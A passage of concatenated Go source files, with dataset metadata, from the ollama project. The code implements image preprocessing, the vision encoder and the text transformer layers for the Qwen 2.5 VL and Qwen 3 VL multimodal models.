temporal frame to all other frames if temporalPatchSize > 1 { for c := range channels { channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize) firstFrameOffset := channelOffset frameSize := patchSize * patchSize // Copy first frame to all other frames for tp := 1; tp < temporalPatchSize; tp++ { currentFrameOffset := channelOffset + (tp * frameSize) copy(result[currentFrameOffset:currentFrameOffset+frameSize], result[firstFrameOffset:firstFrameOffset+frameSize]) } } } patchIndex++ } } } } } return result, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/model.go
model/models/qwen25vl/model.go
package qwen25vl import ( "bytes" "image" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.BytePairEncoding *TextModel *VisionModel `gguf:"v"` ImageProcessor } // Implement MultimodalProcessor interface var _ model.MultimodalProcessor = (*Model)(nil) func New(c fs.Config) (model.Model, error) { m := &Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), TextModel: NewTextModel(c), VisionModel: newVisionModel(c), ImageProcessor: newImageProcessor(c), } m.Cache = kvcache.NewCausalCache(m.TextModel.Shift) return m, nil } func (m *Model) PixelValues(ctx ml.Context, multimodalData []byte) (ml.Tensor, *Grid, error) { img, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, nil, err } f32s, grid, err := m.ImageProcessor.ProcessImage(img) if err != nil { return nil, nil, err } // Calculate tensor dimensions patchDim := m.numChannels * m.temporalPatchSize * m.patchSize * m.patchSize numPatches := grid.Temporal * grid.Height * grid.Width pixelValues := ctx.Input().FromFloats(f32s, patchDim, numPatches) return pixelValues, grid, nil } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) == 0 { return nil, model.ErrNoVisionModel } pixels, grid, err := m.PixelValues(ctx, multimodalData) if err != nil { return nil, err } visionOutputs := m.VisionModel.Forward(ctx, pixels, grid) return []input.Multimodal{{Tensor: visionOutputs, Data: grid}}, nil } // PostTokenize arranges Qwen-2.5-VL's inputs for the forward pass func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { // Reset position cache m.positionCache = m.positionCache[:0] var result []*input.Input var ( imageToken int32 = 151655 visionStartToken int32 = 151652 visionEndToken int32 = 151653 ) appendInput := func(i *input.Input, p int) int { result = append(result, i) m.positionCache = append(m.positionCache, int32(p)) return p + 1 } var p int for _, inp := range inputs { if inp.Multimodal == nil { // If not a multimodal input, add it to the result unchanged p = appendInput(inp, p) } else { // First add the vision start token p = appendInput(&input.Input{Token: visionStartToken}, p) // Add the image token with the multimodal tensor data at the first position tokensPerGrid := inp.Multimodal[0].Tensor.Dim(1) appendInput(&input.Input{ Token: imageToken, Multimodal: inp.Multimodal, MultimodalHash: inp.MultimodalHash, SameBatch: tokensPerGrid, }, p) // Add the placeholder tokens for the remaining positions (tokensPerGrid-1) for range tokensPerGrid - 1 { appendInput(&input.Input{Token: imageToken}, p) } grid := inp.Multimodal[0].Data.(*Grid) p = appendInput(&input.Input{Token: visionEndToken}, p+max(grid.Width/m.spatialMergeSize, grid.Height/m.spatialMergeSize)) } } return result, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { // Initial token embedding hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs).Duplicate(ctx) positionSlice := func() [][]int32 { s := [][]int32{ make([]int32, len(batch.Positions)), make([]int32, len(batch.Positions)), make([]int32, len(batch.Positions)), make([]int32, len(batch.Positions)), } for i, position := range batch.Positions { if position < int32(len(m.positionCache)) { position = m.positionCache[position] } else if len(m.positionCache) > 0 { position = position - int32(len(m.positionCache)) + m.positionCache[len(m.positionCache)-1] + 1 } s[0][i] = position s[1][i] = position s[2][i] = position } return s }() for _, mi := range batch.Multimodal { img := mi.Multimodal[0].Tensor ctx.Forward(img.Copy(ctx, hiddenStates.View(ctx, mi.Index*hiddenStates.Stride(1), img.Dim(0)*img.Dim(1)))) if grid, ok := mi.Multimodal[0].Data.(*Grid); ok { for i := range img.Dim(1) { w := grid.Width / m.spatialMergeSize positionSlice[1][mi.Index+i] += int32(i / w) positionSlice[2][mi.Index+i] += int32(i % w) } } } positions := ctx.Input().FromInts(slices.Concat(positionSlice...), len(positionSlice[0])*len(positionSlice)) // Process through transformer layers for i, layer := range m.TextModel.Layers { m.Cache.SetLayer(i) var lastLayerOutputs ml.Tensor if i == len(m.TextModel.Layers)-1 { lastLayerOutputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, lastLayerOutputs, m.Cache, m.TextOptions) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.TextModel.eps) return m.Output.Forward(ctx, hiddenStates), nil } func init() { model.Register("qwen25vl", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/model_vision.go
model/models/qwen25vl/model_vision.go
package qwen25vl import ( "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" ) func blockDiagonalMask(ctx ml.Context, seqLength int, bounds []int) ml.Tensor { // Initialize a 2D mask with -Inf s := make([][]float32, seqLength) for i := range s { s[i] = slices.Repeat([]float32{float32(math.Inf(-1))}, seqLength) } // Fill in the mask with zeros for tokens that CAN attend to each other for i := 1; i < len(bounds); i++ { start, end := bounds[i-1], bounds[i] // Enable attention within this sequence block for row := start; row < end; row++ { for col := start; col < end; col++ { s[row][col] = 0.0 } } } return ctx.Input().FromFloats(slices.Concat(s...), seqLength, seqLength) } type VisionSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_out"` } func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenStates, positions, mask ml.Tensor, opts *VisionModelOptions) ml.Tensor { query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim, opts.numHeads, query.Dim(1)) key = key.Reshape(ctx, opts.headDim, opts.numHeads, key.Dim(1)) value = value.Reshape(ctx, opts.headDim, opts.numHeads, value.Dim(1)) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) // Scale factor for scaled dot-product attention scale := 1.0 / math.Sqrt(float64(opts.headDim)) // Scaled dot-product attention query = query.Permute(ctx, 0, 2, 1, 3) key = key.Permute(ctx, 0, 2, 1, 3) value = value.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) kq := key.MulmatFullPrec(ctx, query) kq = kq.Scale(ctx, scale) if mask != nil { kq = kq.Add(ctx, mask) } kq = kq.Softmax(ctx) kqv := value.Mulmat(ctx, kq) attention := kqv.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2)) return sa.Output.Forward(ctx, attention) } // VisionMLP implements the multi-layer perceptron type VisionMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionModelOptions) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type VisionEncoderLayer struct { Norm1 *nn.RMSNorm `gguf:"ln1"` SelfAttention *VisionSelfAttention Norm2 *nn.RMSNorm `gguf:"ln2"` MLP *VisionMLP } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenStates, positions, mask ml.Tensor, opts *VisionModelOptions) ml.Tensor { residual := hiddenStates hiddenStates = e.Norm1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.SelfAttention.Forward(ctx, hiddenStates, positions, mask, opts) hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = e.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } // VisionModelOptions contains configuration options type VisionModelOptions struct { hiddenSize int numHeads int headDim int patchSize int numChannels int eps float32 ropeTheta float32 spatialMergeSize int windowSize int fullAttnBlocks []int32 temporalPatchSize int } func (o VisionModelOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim/2, o.ropeTheta, 1, rope.WithVision([]int{ o.headDim / 4, o.headDim / 4, o.headDim / 4, o.headDim / 4, }), ) } type PatchEmbedding struct { PatchConv0 *nn.Conv2D `gguf:"patch_embd_0"` PatchConv1 *nn.Conv2D `gguf:"patch_embd_1"` } func (pe *PatchEmbedding) Forward(ctx ml.Context, pixelValues ml.Tensor, opts *VisionModelOptions) ml.Tensor { numPatches := pixelValues.Shape()[1] // Reshape the input tensor to match the expected dimensions pixelValues = pixelValues.Reshape(ctx, opts.patchSize*opts.patchSize, opts.temporalPatchSize, opts.numChannels, numPatches) // Permute the tensor to bring the temporal dimension to the front pixelValues = pixelValues.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) // Split the tensor into parts for the temporal convolutions in0 := pixelValues.View(ctx, 0, 1, pixelValues.Stride(1), pixelValues.Dim(1), pixelValues.Stride(2), pixelValues.Dim(2), pixelValues.Stride(3), pixelValues.Dim(3)).Contiguous(ctx) in0 = in0.Reshape(ctx, opts.patchSize, opts.patchSize, opts.numChannels, numPatches) in1 := pixelValues.View(ctx, pixelValues.Stride(0), 1, pixelValues.Stride(1), pixelValues.Dim(1), pixelValues.Stride(2), pixelValues.Dim(2), pixelValues.Stride(3), pixelValues.Dim(3)).Contiguous(ctx) in1 = in1.Reshape(ctx, opts.patchSize, opts.patchSize, opts.numChannels, numPatches) s0, s1 := opts.patchSize, opts.patchSize // Use full stride p0, p1 := 0, 0 // padding d0, d1 := 1, 1 // dilation out0 := pe.PatchConv0.Forward(ctx, in0, s0, s1, p0, p1, d0, d1) out1 := pe.PatchConv1.Forward(ctx, in1, s0, s1, p0, p1, d0, d1) // Add the outputs from the two temporal convolutions out := out0.Add(ctx, out1) // Reshape the output tensor to match the expected dimensions return out.Reshape(ctx, opts.hiddenSize, numPatches) } // VisionPatchMerger implements patch merging for the Qwen vision model type VisionPatchMerger struct { LNQ *nn.RMSNorm `gguf:"ln_q"` MLP0 *nn.Linear `gguf:"mlp.0"` MLP2 *nn.Linear `gguf:"mlp.2"` } // Forward computes patch merging for the vision model func (pm *VisionPatchMerger) Forward(ctx ml.Context, visionOutputs ml.Tensor, opts *VisionModelOptions) ml.Tensor { normalized := pm.LNQ.Forward(ctx, visionOutputs, opts.eps) hiddenSize := visionOutputs.Dim(0) * (opts.spatialMergeSize * opts.spatialMergeSize) // Reshape the normalized output to view the hidden size dimension reshaped := normalized.Reshape(ctx, hiddenSize, normalized.Dim(1)/(opts.spatialMergeSize*opts.spatialMergeSize)) hidden := pm.MLP0.Forward(ctx, reshaped) activated := hidden.GELU(ctx) output := pm.MLP2.Forward(ctx, activated) return output } // VisionModel implements the Qwen vision model type VisionModel struct { PatchEmbedding *PatchEmbedding Layers []VisionEncoderLayer `gguf:"blk"` PatchMerger *VisionPatchMerger `gguf:"merger"` *VisionModelOptions } // Forward computes the vision model for an input tensor func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor, grid *Grid) ml.Tensor { // Extract patch embeddings hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.VisionModelOptions) index, bounds := m.windowIndex(grid) spatialMergeUnit := m.spatialMergeSize * m.spatialMergeSize windowIndex := ctx.Input().FromInts(index, len(index)) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0)*spatialMergeUnit, hiddenStates.Dim(1)/spatialMergeUnit) hiddenStates = hiddenStates.Rows(ctx, windowIndex.Argsort(ctx)) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0)/spatialMergeUnit, hiddenStates.Dim(1)*spatialMergeUnit) positions := ctx.Input().FromInts(func() []int32 { s := [][]int32{ make([]int32, grid.Height*grid.Width), make([]int32, grid.Height*grid.Width), make([]int32, grid.Height*grid.Width), make([]int32, grid.Height*grid.Width), } var cur int for y := 0; y < grid.Height; y += m.spatialMergeSize { for x := 0; x < grid.Width; x += m.spatialMergeSize { for dy := range 2 { for dx := range 2 { i := int(index[cur/spatialMergeUnit]) * spatialMergeUnit i += cur % spatialMergeUnit s[0][i] = int32(y + dy) s[1][i] = int32(x + dx) s[2][i] = int32(y + dy) s[3][i] = int32(x + dx) cur++ } } } } return slices.Concat(s...) }(), grid.Height*grid.Width*4) mask := blockDiagonalMask(ctx, hiddenStates.Dim(1), bounds) // Apply encoder layers for i, layer := range m.Layers { if slices.Contains(m.fullAttnBlocks, int32(i)) { hiddenStates = layer.Forward(ctx, hiddenStates, positions, nil, m.VisionModelOptions) } else { hiddenStates = layer.Forward( ctx, hiddenStates, positions, mask, m.VisionModelOptions, ) } } hiddenStates = m.PatchMerger.Forward(ctx, hiddenStates, m.VisionModelOptions) return hiddenStates.Rows(ctx, windowIndex) } // windowIndex divides the grid into windows and returns: // 1. A slice of grid point indices organized by windows // 2. A slice of boundaries that mark where each window's data begins and ends // in the flattened representation, scaled by spatialMergeSize squared // // The boundaries slice always starts with 0 and contains cumulative ending // positions for each window, allowing downstream processing to identify // window boundaries in the tensor data. func (m *VisionModel) windowIndex(grid *Grid) (index []int32, bounds []int) { height := grid.Height / m.spatialMergeSize width := grid.Width / m.spatialMergeSize window := m.windowSize / m.patchSize / m.spatialMergeSize index = make([]int32, height*width) bounds = make([]int, 0, ((height+window-1)/window)*((width+window-1)/window)+1) bounds = append(bounds, 0) var cur int32 for y := 0; y < height; y += window { for x := 0; x < width; x += window { h1 := min(window, height-y) w1 := min(window, width-x) for dy := range h1 { for dx := range w1 { win := (y+dy)*width + (x + dx) index[win] = cur cur++ } } bounds = append(bounds, int(cur)*window) } } return index, bounds } // newVisionModel creates a new instance of the Qwen vision model func newVisionModel(c fs.Config) *VisionModel { patchSize := int(c.Uint("vision.patch_size", 14)) hiddenSize := int(c.Uint("vision.embedding_length", 1280)) numHeads := int(c.Uint("vision.attention.head_count", 16)) numChannels := int(c.Uint("vision.num_channels", 3)) eps := c.Float("vision.attention.layer_norm_epsilon", 1e-6) ropeTheta := c.Float("vision.rope.freq_base", 10000.0) spatialMergeSize := int(c.Uint("vision.spatial_merge_size", 2)) windowSize := int(c.Uint("vision.window_size", 112)) fullAttnBlocks := c.Ints("qwen25vl.vision.fullatt_block_indexes", []int32{7, 15, 23, 31}) temporalPatchSize := int(c.Uint("vision.temporal_patch_size", 2)) model := &VisionModel{ Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count", 32)), VisionModelOptions: &VisionModelOptions{ hiddenSize: hiddenSize, numHeads: numHeads, headDim: hiddenSize / numHeads, patchSize: patchSize, numChannels: numChannels, eps: eps, ropeTheta: ropeTheta, spatialMergeSize: spatialMergeSize, windowSize: windowSize, temporalPatchSize: temporalPatchSize, fullAttnBlocks: fullAttnBlocks, }, } return model }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/model_text.go
model/models/qwen25vl/model_text.go
package qwen25vl import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" ) type TextOptions struct { hiddenSize, numHeads, numKVHeads int ropeDim, originalContextLength int eps, ropeBase, ropeScale float32 mropeSections []int } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, rope.WithMRoPE(o.mropeSections)) } type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *TextOptions positionCache []int32 } func NewTextModel(c fs.Config) *TextModel { m := TextModel{ Layers: make([]Layer, c.Uint("block_count")), TextOptions: &TextOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), ropeDim: int(c.Uint("rope.dimension_count", 128)), originalContextLength: int(c.Uint("context_length", 128000)), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), mropeSections: func() []int { sections := c.Ints("rope.mrope_section") s := make([]int, len(sections)) for i, section := range sections { s[i] = int(section) } return s }(), }, } return &m } // SelfAttention implements the multi-head self-attention mechanism // with separate projections for query, key, value and output transformations type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positionIDs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := opts.hiddenSize / opts.numHeads q := sa.Query.Forward(ctx, hiddenState) q = q.Reshape(ctx, headDim, opts.numHeads, batchSize) q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs) k := sa.Key.Forward(ctx, hiddenState) k = k.Reshape(ctx, headDim, opts.numKVHeads, batchSize) k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs) v := sa.Value.Forward(ctx, hiddenState) v = v.Reshape(ctx, headDim, opts.numKVHeads, batchSize) scaleFactor := 1.0 / math.Sqrt(float64(headDim)) kqv := nn.Attention(ctx, q, k, v, scaleFactor, cache) kqv = kqv.Reshape(ctx, opts.hiddenSize, batchSize) return sa.Output.Forward(ctx, kqv) } // Shift applies rotary position embeddings to the key tensor for causal attention caching func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { m.positionCache = nil return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } // MLP implements the feed-forward network component with SwiGLU activation type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextOptions) ml.Tensor { // Apply SwiGLU activation gating hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) // Project back to hidden dimension return mlp.Down.Forward(ctx, hiddenState) } // Layer represents a single transformer layer combining self-attention and feed-forward components type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *SelfAttention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP } func (l *Layer) Forward(ctx ml.Context, hiddenState, positionIDs, outputs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { // Self-attention branch with residual connection residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positionIDs, cache, opts) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) // Feed-forward branch with residual connection residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/imageprocessor.go
model/models/qwen3vl/imageprocessor.go
package qwen3vl import ( "fmt" "image" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model/imageproc" ) // ImageProcessor contains configuration for the Qwen 3 VL image processing type ImageProcessor struct { numChannels int patchSize int temporalPatchSize int mergeSize int shortestEdge int longestEdge int factor int rescaleFactor float32 imageMean []float32 imageStd []float32 } // newImageProcessor creates a new image processor with default values func newImageProcessor(c fs.Config) ImageProcessor { patchSize := int(c.Uint("vision.patch_size", 14)) mergeSize := int(c.Uint("vision.spatial_merge_size", 2)) return ImageProcessor{ numChannels: int(c.Uint("vision.num_channels", 3)), // not set patchSize: patchSize, temporalPatchSize: 2, mergeSize: mergeSize, shortestEdge: int(c.Uint("vision.shortest_edge", 64<<10)), // FIXME(mxyng): the model defined longest edge (16M) is too large for the default // context length of 8K and will panic. Adjusting to 2M for now. // longestEdge: int(c.Uint("vision.longest_edge", 16<<20)), longestEdge: 2 << 20, factor: patchSize * mergeSize, rescaleFactor: 1.0 / 255.0, imageMean: c.Floats("vision.image_mean", imageproc.ImageNetStandardMean[:]), imageStd: c.Floats("vision.image_std", imageproc.ImageNetStandardSTD[:]), } } // SmartResize implements the smart resize algorithm func (p *ImageProcessor) SmartResize(height, width int) (int, int) { factor := p.factor if height < factor || width < factor { panic(fmt.Sprintf("height:%d or width:%d must be larger than factor:%d", height, width, factor)) } else if aspectRatio := max(height, width) / min(height, width); aspectRatio > 200 { panic(fmt.Sprintf("absolute aspect ratio must be smaller than 200, got %v", aspectRatio)) } round := func(x float64) int { return int(math.RoundToEven(x)) } hBar := round(float64(height)/float64(factor)) * factor wBar := round(float64(width)/float64(factor)) * factor if hBar*wBar > p.longestEdge { beta := math.Sqrt(float64(height*width) / float64(p.longestEdge)) hBar = int(math.Floor(float64(height)/beta/float64(factor))) * factor wBar = int(math.Floor(float64(width)/beta/float64(factor))) * factor } else if hBar*wBar < p.shortestEdge { beta := math.Sqrt(float64(p.shortestEdge) / float64(height*width)) hBar = int(math.Ceil(float64(height)*beta/float64(factor))) * factor wBar = int(math.Ceil(float64(width)*beta/float64(factor))) * factor } return hBar, wBar } type Grid struct { Height int Width int Temporal int } func (p *ImageProcessor) ProcessImage(ctx ml.Context, img image.Image) (ml.Tensor, *Grid, error) { img = imageproc.Composite(img) origWidth := img.Bounds().Dx() origHeight := img.Bounds().Dy() // Calculate smart resize dimensions resizedHeight, resizedWidth := p.SmartResize(origHeight, origWidth) // Resize image using existing functions resizedImg := imageproc.Resize(img, image.Point{X: resizedWidth, Y: resizedHeight}, imageproc.ResizeBilinear) normalizedPixels := imageproc.Normalize( resizedImg, [3]float32{p.imageMean[0], p.imageMean[1], p.imageMean[2]}, [3]float32{p.imageStd[0], p.imageStd[1], p.imageStd[2]}, true, // rescale true, // channelFirst ) // Calculate grid dimensions grid := &Grid{ Height: resizedHeight / p.patchSize, Width: resizedWidth / p.patchSize, Temporal: 1, // For single images, temporal dimension is 1 } patches, err := p.createPatches(normalizedPixels, resizedHeight, resizedWidth, grid) if err != nil { return nil, nil, fmt.Errorf("failed to create patches: %v", err) } patchDim := p.numChannels * p.temporalPatchSize * p.patchSize * p.patchSize numPatches := grid.Temporal * grid.Height * grid.Width pixelValues := ctx.Input().FromFloats(patches, patchDim, numPatches) // Return patches and grid dimensions return pixelValues, grid, nil } func (p *ImageProcessor) createPatches(pixels []float32, height, width int, grid *Grid) ([]float32, error) { channels := p.numChannels patchSize := p.patchSize mergeSize := p.mergeSize temporalPatchSize := p.temporalPatchSize // Calculate output dimensions numPatches := grid.Temporal * grid.Height * grid.Width patchDim := channels * temporalPatchSize * patchSize * patchSize result := make([]float32, numPatches*patchDim) patchIndex := 0 // Single temporal frame handling (copies to all frames) for range grid.Temporal { for h := 0; h < grid.Height; h += mergeSize { for w := 0; w < grid.Width; w += mergeSize { // Handle the 2x2 merged patches for mh := range mergeSize { for mw := range mergeSize { baseOffset := patchIndex * patchDim // Extract patch data for first temporal frame for c := range channels { channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize) for py := range patchSize { for px := range patchSize { // Calculate source pixel coordinates y := (h+mh)*patchSize + py x := (w+mw)*patchSize + px // Source index in input tensor (CHW format) srcIdx := c*height*width + y*width + x // Destination index in first temporal frame dstIdx := channelOffset + (py * patchSize) + px if srcIdx < len(pixels) && dstIdx < len(result) { result[dstIdx] = pixels[srcIdx] } } } } // Copy first temporal frame to all other frames if temporalPatchSize > 1 { for c := range channels { channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize) firstFrameOffset := channelOffset frameSize := patchSize * patchSize // Copy first frame to all other frames for tp := 1; tp < temporalPatchSize; tp++ { currentFrameOffset := channelOffset + (tp * frameSize) copy(result[currentFrameOffset:currentFrameOffset+frameSize], result[firstFrameOffset:firstFrameOffset+frameSize]) } } } patchIndex++ } } } } } return result, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/model.go
model/models/qwen3vl/model.go
package qwen3vl import ( "bytes" "image" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor *TextModel *VisionModel `gguf:"v"` ImageProcessor positionCache []int32 } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) == 0 { return nil, model.ErrNoVisionModel } img, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, err } pixelValues, grid, err := m.ProcessImage(ctx, img) if err != nil { return nil, err } // Calculate tensor dimensions visionOutputs, deepstackVisualEmbeds := m.VisionModel.Forward(ctx, pixelValues, grid) mm := []input.Multimodal{{Tensor: visionOutputs, Data: grid}} for i := range deepstackVisualEmbeds { mm = append(mm, input.Multimodal{Tensor: deepstackVisualEmbeds[i]}) } return mm, nil } var ( tokenVision int32 = 151655 tokenVisionStart int32 = 151652 tokenVisionEnd int32 = 151653 ) type modelInput struct { *input.Input position int32 } // PostTokenize arranges Qwen 3 VL's inputs for the forward pass func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { m.positionCache = m.positionCache[:0] return slices.Collect(func(yield func(*input.Input) bool) { for i := range inputs { s := []modelInput{{Input: inputs[i]}} if mm := inputs[i].Multimodal; mm != nil { t := mm[0].Tensor s = slices.Repeat([]modelInput{ { position: int32(i + 1), Input: &input.Input{Token: tokenVision}, }, }, t.Dim(1)+1+1) s[0] = modelInput{ Input: &input.Input{Token: tokenVisionStart}, position: int32(i), } s[len(s)-1] = modelInput{ Input: &input.Input{Token: tokenVisionEnd}, position: int32(i + mm[0].Data.(*Grid).Width/m.spatialMergeSize + 1), } s[1] = modelInput{ Input: &input.Input{ Token: tokenVision, Multimodal: inputs[i].Multimodal, MultimodalHash: inputs[i].MultimodalHash, SameBatch: t.Dim(1), }, position: int32(i + 1), } } for _, e := range s { position := e.position if position == 0 && len(m.positionCache) > 0 { position = m.positionCache[len(m.positionCache)-1] + 1 } m.positionCache = append(m.positionCache, position) if !yield(e.Input) { return } } } }), nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { // ggml mrope requires 4 positions per token: [time, height, width, extra] positionSlice := slices.Collect(makeSlice2D[int32](4, len(batch.Positions))) for i, id := range batch.Positions { if id < int32(len(m.positionCache)) { id = m.positionCache[id] } else if len(m.positionCache) > 0 { id = id - int32(len(m.positionCache)) + m.positionCache[len(m.positionCache)-1] + 1 } positionSlice[0][i] = id positionSlice[1][i] = id positionSlice[2][i] = id // positionSlice[3] is intentionally left as zeros } hiddenStates := m.TextModel.TokenEmbedding.Forward(ctx, batch.Inputs).Duplicate(ctx) var deepstackVisualEmbeds []ml.Tensor for _, mi := range batch.Multimodal { visionOutputs := mi.Multimodal[0].Tensor ctx.Forward(visionOutputs.Copy(ctx, hiddenStates.View(ctx, mi.Index*hiddenStates.Stride(1), visionOutputs.Dim(0)*visionOutputs.Dim(1)))) if grid, ok := mi.Multimodal[0].Data.(*Grid); ok { for i := range visionOutputs.Dim(1) { w := grid.Width / m.spatialMergeSize positionSlice[1][mi.Index+i] += int32(i / w) positionSlice[2][mi.Index+i] += int32(i % w) } } 